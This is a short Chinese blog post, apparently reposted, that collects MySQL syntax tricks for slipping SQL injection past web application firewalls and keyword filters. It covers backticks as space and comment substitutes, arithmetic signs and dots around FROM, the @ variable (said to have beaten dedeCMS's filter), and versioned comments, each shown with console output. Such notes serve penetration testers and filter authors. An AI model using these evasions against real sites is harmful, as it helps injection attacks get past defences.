技术笔记

WAF绕过的一些技巧

字号+ 作者:匿名投稿 来源:转载 2016-12-16 10:38 我要评论( )

tips1: 神奇的 ` (格式输出表的那个控制符) 过空格和一些正则。 mysql select`version`() - ; +-+ | `version`() +-+ | 5.1.50-community-log | +-+ 1 row in set ......

tips1: 神奇的    ` (格式输出表的那个控制符)

过空格和一些正则。

mysql> select`version`()

-> ;

+———————-+

| `version`()

+———————-+

| 5.1.50-community-log |

+———————-+

1 row in set (0.00 sec)

一个更好玩的技巧,这个`控制符可以当注释符用(限定条件)。

mysql> select id from qs_admins where id=1;`dfff and comment it;

+—-+

| id |

+—-+

| 1  |

+—-+

1 row in set (0.00 sec)

usage : where   id =’0’`’xxxxcomment on.

tips2:神奇的- + .

mysql> select id from qs_admins;

+—-+

| id |

+—-+

| 1  |

+—-+

1 row in set (0.00 sec)

mysql> select+id-1+1.from qs_admins;

+———-+

| +id-1+1. |

+———-+

| 1   |

+———-+

1 row in set (0.00 sec)

mysql> select-id-1+3.from qs_admins;

+———-+

 

| -id-1+3. |

+———-+

| 1   |

+———-+

1 row in set (0.00 sec)

(有些人不是一直在说关键字怎么过?过滤一个 from …就是这样连起来过)

tips3: @

mysql> select@^1.from qs_admins;

+——|+

| @^1. |

+——|+

| NULL |

+——|+

这个是 bypass曾经dedeCMS filter .

或者这样也是 ok.

tips4:mysql function() as xxx 也可以不用 as 和空格

mysql> select-count(id)test from qs_admins;

+——|+

| test |

+——|+

| -1   |

+——|+

1 row in set (0.00 sec)

tips5:/*![>5000]*/ 新构造版本号(这个可能有些过时了。)

mysql> /\*!40000select\*/ id from qs_admins;

+—-+

| id |

+—-+

|  1 |

+—-+

1 row in set (0.00 sec)

 

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Note/412.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~